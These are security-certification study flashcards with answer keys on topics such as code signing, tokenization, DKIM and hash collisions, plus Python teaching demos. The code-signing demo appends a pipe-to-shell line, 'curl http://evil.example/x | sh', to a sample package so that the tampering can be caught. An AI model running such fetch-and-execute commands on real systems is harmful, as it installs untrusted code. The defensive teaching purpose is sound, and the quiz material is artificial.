PM SG 5-6 Flashcards
Data in-transit, data in-use, or data at-rest
1.A point of sale terminal validates a credit card expiration date
2.A cloud app transaction sends data to multiple data centers
3.All backup tapes are stored at a secure facility
4.A database server stores all customer data in a RAID array
5.An email’s digital signature is validated when the message is opened
6.Encrypted data is sent over a VPN between remote sites
A:
1.A point of sale terminal validates a credit card expiration date → Data in-use
2.A cloud app transaction sends data to multiple data centers → Data in-transit
3.All backup tapes are stored at a secure facility → Data at-rest
4.A database server stores all customer data in a RAID array → Data at-rest
5.An email’s digital signature is validated when the message is opened → Data in-use
6.Encrypted data is sent over a VPN between remote sites → Data in-transit
Data in-use: Data actively being processed, so it sits decrypted in memory or CPU registers (e.g., a terminal checking an expiration date, a mail client verifying a signature). Protected by memory isolation, secure enclaves, and limiting what can read process memory.
Data in-transit: Data moving across a network (e.g., a VPN between sites, a transaction sent to a data center). Protected with TLS, IPsec, or another transport encryption; the data is in transit whether or not it is already encrypted.
Data at-rest: Stored, inactive data (e.g., backup tapes, a RAID array). Protected with full-disk, file, or database encryption plus physical security. Note that RAID adds availability, not confidentiality, so data on the array is still at rest and needs its own encryption.
A company would like to ensure all new software installations use unmodified code from the developers. Which of the following would provide this functionality?
1.Code signing
2.Input validation
3.Sandboxing
4.Static code analysis
5.Secure cookies
Correct Answer: 1.Code signing
A:
Code signing: The publisher signs a hash of the software with a private key; the installer verifies the signature with the publisher’s public key (usually carried in a certificate). A valid signature proves the code is unmodified since it was signed and that it came from the holder of that key. It does not prove the code is free of vulnerabilities, and it only helps if the installation process refuses unsigned packages or packages signed by an untrusted signer.
Incorrect options:
2.Input validation: Prevents malformed input but doesn’t verify software authenticity.
3.Sandboxing: Isolates programs at run time but doesn’t validate their integrity.
4.Static code analysis: Checks source code for vulnerabilities, not authenticity.
5.Secure cookies: Protect browser cookies in transit; unrelated to software installation.
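An added worked example (not part of the flashcard set) showing why a signature gives both integrity and authenticity while a published checksum gives neither against an attacker who can replace the file. It uses textbook RSA with no padding and a seeded RNG, purely so the arithmetic is visible; real code signing uses PKCS#1 v1.5 or PSS padding, certificates, and keys generated in an HSM. The package bytes and the "evil.example" tamper line are constructed for the demo.

```python
import hashlib
import random

# Fixed seed so the example reproduces. A real signer draws key material from
# a hardware RNG (ideally inside an HSM); never seed key generation like this.
_rng = random.Random(20240601)


def _probably_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin primality test (enough for a demonstration key)."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = _rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        cand = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _probably_prime(cand):
            return cand


def generate_keypair(bits: int = 1024):
    """Textbook RSA key pair: returns (public=(e, n), private=(d, n))."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        if p != q and (p - 1) % e and (q - 1) % e:
            break
    n, phi = p * q, (p - 1) * (q - 1)
    return (e, n), (pow(e, -1, phi), n)


def _digest_int(package: bytes) -> int:
    return int.from_bytes(hashlib.sha256(package).digest(), "big")


def sign_package(private_key, package: bytes) -> int:
    """Publisher side: sign SHA-256(package) with the private key (no padding; toy only)."""
    d, n = private_key
    return pow(_digest_int(package), d, n)


def verify_package(public_key, package: bytes, signature: int) -> bool:
    """Installer side: recompute the digest and compare it with the opened signature."""
    e, n = public_key
    return pow(signature, e, n) == _digest_int(package)


def checksum_only_check(package: bytes, published_digest: str) -> bool:
    """A bare checksum: whoever can replace the file can republish this too."""
    return hashlib.sha256(package).hexdigest() == published_digest


def scenario() -> dict:
    vendor_pub, vendor_priv = generate_keypair()
    _attacker_pub, attacker_priv = generate_keypair()
    original = b"#!/bin/sh\necho 'installing app v1.2'\n"      # constructed package
    trojaned = original + b"curl http://evil.example/x | sh\n"  # constructed tampering
    sig = sign_package(vendor_priv, original)
    return {
        "genuine_verifies": verify_package(vendor_pub, original, sig),
        "tampered_fails": not verify_package(vendor_pub, trojaned, sig),
        # the attacker's own key is not the one the installer trusts
        "resigned_by_attacker_fails": not verify_package(
            vendor_pub, trojaned, sign_package(attacker_priv, trojaned)),
        # an attacker who replaced the package also replaced its published checksum
        "checksum_alone_fooled": checksum_only_check(
            trojaned, hashlib.sha256(trojaned).hexdigest()),
    }


if __name__ == "__main__":
    for check, ok in scenario().items():
        print(f"{check}: {ok}")
```

The last check is the practical point: a SHA-256 sum on the download page detects corruption, but not substitution by whoever controls that page or the path to it. Only the private key, which the attacker does not hold, turns the hash into evidence of origin.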
A company’s IT department uses Google Analytics to produce reports for the CEO on the performance of their in-house web servers. Which of the following would best describe Google Analytics?
1.Data owner
2.Data retention
3.Data plane
4.Data processor
5.Data controller
Correct Answer: 4.Data processor
A:
Data processor: Processes data on behalf of a data controller (e.g., Google Analytics processing the company’s web server data under the company’s instructions).
Incorrect options:
1.Data owner: The internal role accountable for a data set, not an outside service.
2.Data retention: Involves storage and deletion policies, not processing.
3.Data plane: Network term for the path that forwards traffic; unrelated to data roles.
5.Data controller: Decides why and how data is processed (e.g., the company, not Google Analytics).
Which of the following technologies is commonly associated with making in-person credit card purchases from a phone or smart watch?
1.Tokenization
2.Key stretching
3.Salted hash
4.Hardware security module
5.Data masking
Correct Answer: 1.Tokenization
A:
Tokenization: Replaces the card number (PAN) with a token that has no mathematical relationship to it. The wallet app stores the token, the merchant receives the token plus a per-transaction cryptogram rather than the card number, and only the payment network’s token service can map the token back to the PAN. A token stolen from a merchant is of little use elsewhere.
Incorrect options:
2.Key stretching & 3.Salted hash: Protect stored passwords; they don’t enable payments.
4.HSM: Hardware that protects cryptographic keys (a token service may use one), but it isn’t the payment mechanism.
5.Data masking: Hides part of a value on display (e.g., **** **** **** 1111), not a way to pay.
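An added example, not from the flashcard set, modelling the tokenization flow in simplified form: the token service keeps the PAN in its vault, hands the phone a format-preserving token plus a key, and the phone produces a per-transaction cryptogram so that a captured token and cryptogram cannot simply be replayed. The class names, the counter-based anti-replay rule, and the truncated-HMAC cryptogram are assumptions for illustration, not the EMV payment tokenization specification; 4111111111111111 is a well-known test PAN.

```python
import hashlib
import hmac
import secrets


def luhn_valid(number: str) -> bool:
    """Luhn check-digit test used by card numbers (and kept by format-preserving tokens)."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def make_cryptogram(key: bytes, token: str, counter: int, amount_cents: int) -> str:
    """Device side: per-transaction HMAC binding token, counter and amount (simplified model)."""
    msg = f"{token}|{counter}|{amount_cents}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:16]


class TokenService:
    """Constructed model of a payment network's token service provider (TSP)."""

    def __init__(self):
        self._pan_by_token = {}     # the vault: the only place the PAN exists
        self._key_by_token = {}     # per-token key shared with the device's secure element
        self._last_counter = {}

    def provision(self, pan: str):
        """Issue a device token for a PAN. Returns (token, device_key); the PAN never leaves."""
        if not (pan.isdigit() and luhn_valid(pan)):
            raise ValueError("not a valid PAN")
        while True:
            # 11 random digits, one Luhn-adjusting digit, then the real last four so
            # receipts and the wallet can still display "ending in 1111".
            body = "".join(str(secrets.randbelow(10)) for _ in range(11))
            for check in "0123456789":
                token = body + check + pan[-4:]
                if luhn_valid(token):
                    break
            if token != pan and token not in self._pan_by_token:
                break
        key = secrets.token_bytes(32)
        self._pan_by_token[token] = pan
        self._key_by_token[token] = key
        self._last_counter[token] = 0
        return token, key

    def authorize(self, token: str, counter: int, amount_cents: int, cryptogram: str) -> str:
        """What arrives via the merchant's acquirer. Returns a decision, never the PAN."""
        key = self._key_by_token.get(token)
        if key is None:
            return "unknown_token"
        if counter <= self._last_counter[token]:
            return "replay"                 # the counter must strictly increase
        expected = make_cryptogram(key, token, counter, amount_cents)
        if not hmac.compare_digest(expected, cryptogram):
            return "bad_cryptogram"         # token or amount altered, or key not held
        self._last_counter[token] = counter
        # Only here is the token mapped back to the real PAN for the issuer:
        _real_pan = self._pan_by_token[token]
        return "approved"


if __name__ == "__main__":
    tsp = TokenService()
    token, key = tsp.provision("4111111111111111")   # well-known test PAN
    print("merchant sees token:", token, "last four kept:", token[-4:])
    tap = make_cryptogram(key, token, 1, 1999)
    print("first tap:", tsp.authorize(token, 1, 1999, tap))
    print("replayed tap:", tsp.authorize(token, 1, 1999, tap))
```

The merchant, its point-of-sale logs, and anyone sniffing the terminal see only the token and a cryptogram that is valid for one counter value and one amount; the Luhn-valid, last-four-preserving format lets legacy systems that expect a card number keep working.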
Which of the following would be considered an IoC (indicator of compromise)?
1.Public key received via email
2.Login required an app confirmation
3.Server not responding to pings
4.Passwords stored with a salted hash
5.Laptop restarted after patching
Correct Answer: 3.Server not responding to pings
A:
IoC (indicator of compromise): An observable that suggests a system may have been breached, such as a server that suddenly stops responding to pings (possible crash, denial of service, or an attacker altering the host or its firewall). It is a prompt to investigate, not proof: hardware failures and maintenance produce the same symptom, so correlate it with other telemetry before declaring an incident.
Incorrect options:
1.Public key received via email: Normal key exchange; public keys are not secret.
2.Login requiring app confirmation: A security measure (MFA), not an IoC.
4.Passwords stored with a salted hash: A security best practice.
5.Laptop restarted after patching: Expected behavior after an update.
Match the device to the description:
1) Sensor 2) WAF 3) NGFW 4) Load balancer
A) Backup and manage certificates for all company web servers
B) Use multiple servers to support a single application
C) Forward traffic based on destination IP address
D) Allow or block network traffic based on application name
E) Block application attacks to a web server
F) Access a protected network from an external connection
G) Gather performance metrics from network traffic flows
A:
1.Sensor → G. Gather performance metrics from network traffic flows
2.WAF (Web Application Firewall) → E. Block application attacks to a web server
3.NGFW (Next-Generation Firewall) → D. Allow or block network traffic based on application name
4.Load balancer → B. Use multiple servers to support a single application
The unused descriptions are distractors: A describes a certificate management service, C a router (layer 3 forwarding), and F a VPN concentrator.
A mail server digitally signs all outgoing messages. Which of the following is used to validate these digital signatures?
1.DKIM
2.NAC
3.SMTP
4.RADIUS
5.SPF
Correct Answer: 1.DKIM (DomainKeys Identified Mail)
A:
DKIM: The sending mail server signs selected headers and a hash of the body with its private key and adds a DKIM-Signature header. The receiving server fetches the public key from a DNS TXT record at <selector>._domainkey.<domain> and validates the signature, which shows the message was not altered in transit and was signed by that domain.
Incorrect options:
2.NAC: Controls which devices may join the network; unrelated to email.
3.SMTP: The protocol that transfers email; it carries the signature but doesn’t validate it.
4.RADIUS: Authenticates users and devices, not email messages.
5.SPF: Lists which servers may send mail for a domain (checked by source IP); it doesn’t validate signatures.
A company has begun to work with a local service provider and has created a broad set of goals associated with this relationship.
Which of the following would best describe this document?
1.NDA
2.SoW
3.SLA
4.MSA
5.MOU
Correct Answer: 5.MOU (Memorandum of Understanding)
A:
MOU: A memorandum of understanding records shared goals and intentions at the start of a relationship; it is typically informal and non-binding, with the specific obligations defined in later documents.
Incorrect options:
1.NDA: Covers confidentiality, not service goals.
2.SoW: Defines specific deliverables, timelines, and pricing for one piece of work.
3.SLA: Defines measurable service guarantees (uptime, response times) and remedies.
4.MSA: The overarching contract whose legal terms govern future work and SoWs.
A company is upgrading their external firewall to a new version. Which security control category would best apply to this firewall?
1.Technical
2.Physical
3.Operational
4.Occupational
5.Managerial
Correct Answer: 1.Technical
A:
Technical controls: Implemented by technology, such as firewalls, encryption, and authentication systems. (The same firewall is a preventive control by type; category and type are separate classifications.)
Incorrect options:
2.Physical: Refers to physical security (e.g., locks, cameras, guards).
3.Operational: Controls carried out by people and processes (e.g., security awareness training, change management).
4.Occupational: Not a security control category.
5.Managerial: Covers policies, risk assessments, and oversight, not technology.
The hash values from two different inputs are identical. Which of the following would describe this situation?
1.Containerization
2.Spraying
3.Cloning
4.Collision
5.Reflection
Correct Answer: 4.Collision
A:
Collision: Occurs when two different inputs produce the same hash value. Every hash function has collisions in principle (inputs are unbounded, outputs are not), but a secure one should make finding any colliding pair cost about 2^(n/2) operations for an n-bit digest (the birthday bound). MD5 and SHA-1 have practical collision attacks and should not be used where collision resistance matters, such as digital signatures or certificate issuance.
Incorrect options:
1.Containerization: Isolates applications; unrelated to hashing.
2.Spraying: A password attack that tries a few common passwords against many accounts.
3.Cloning: Duplicating data or media; unrelated to hashing.
5.Reflection: Used in reflected attacks such as amplification DDoS; unrelated to hashing.
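An added example, not part of the flashcard set, that makes the birthday bound concrete: SHA-256 is truncated to a small width so a collision can actually be found, and the cost is compared with matching one fixed digest (a second preimage). The "doc-N" and "forged-N" inputs are constructed counters, not real documents; the truncation is only there to make the search feasible and says nothing about full SHA-256.

```python
import hashlib
import math


def truncated_hash(data: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256, standing in for a short hash function."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def find_collision(bits: int, limit: int = 1 << 22):
    """Birthday search: remember every digest seen until one repeats.
    Returns (input_a, input_b, attempts) or None if the limit is hit."""
    seen = {}
    for i in range(limit):
        msg = b"doc-" + str(i).encode()   # constructed inputs
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1   # same digest, different input: a collision
        seen[h] = msg
    return None


def find_second_preimage(target: bytes, bits: int, limit: int = 1 << 22):
    """Match one fixed digest: no table helps, each try succeeds with probability 2^-bits.
    Returns (forged_input, attempts) or None."""
    want = truncated_hash(target, bits)
    for i in range(limit):
        msg = b"forged-" + str(i).encode()
        if msg != target and truncated_hash(msg, bits) == want:
            return msg, i + 1
    return None


def expected_attempts(bits: int):
    """(birthday collision, second preimage) expected work for a bits-wide hash."""
    return math.sqrt(math.pi / 2 * 2 ** bits), float(2 ** bits)


if __name__ == "__main__":
    bits = 32
    a, b, tries = find_collision(bits)
    print(f"{bits}-bit collision after {tries} hashes: {a!r} and {b!r}")
    print(f"  both truncate to {truncated_hash(a, bits):#010x}; full SHA-256 differs:",
          hashlib.sha256(a).digest() != hashlib.sha256(b).digest())
    forged, tries = find_second_preimage(b"doc-0", 16)
    print(f"16-bit second preimage of doc-0 after {tries} hashes: {forged!r}")
    for n in (32, 64, 128, 256):
        col, pre = expected_attempts(n)
        print(f"{n:3d}-bit hash: ~2^{math.log2(col):.1f} for a collision, 2^{n} for a preimage")
```

The asymmetry is the practical lesson: a collision only requires any two inputs that agree, so the attacker controls both sides (the classic case being two documents prepared before one is signed), and the work halves in the exponent. That is why 128-bit digests are no longer acceptable for signatures even though a 128-bit preimage search is still far out of reach.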
The Vice President of Sales has asked the IT team to create daily backups of the sales data. The Vice President is an example of a:
1.Data owner
2.Data controller
3.Data steward
4.Data processor
Correct Answer: 1.Data owner
A:
Data owner: A senior role accountable for a data set, who decides how it must be classified, protected, and retained (here, requiring daily backups). The IT staff who perform the backups act as custodians.
Incorrect options:
2.Data controller: A privacy-law role that determines the purpose and means of processing personal data; the question is about internal accountability for the data.
3.Data steward: Manages data quality and day-to-day handling but doesn’t set policy.
4.Data processor: Processes data on the owner’s behalf but doesn’t own it.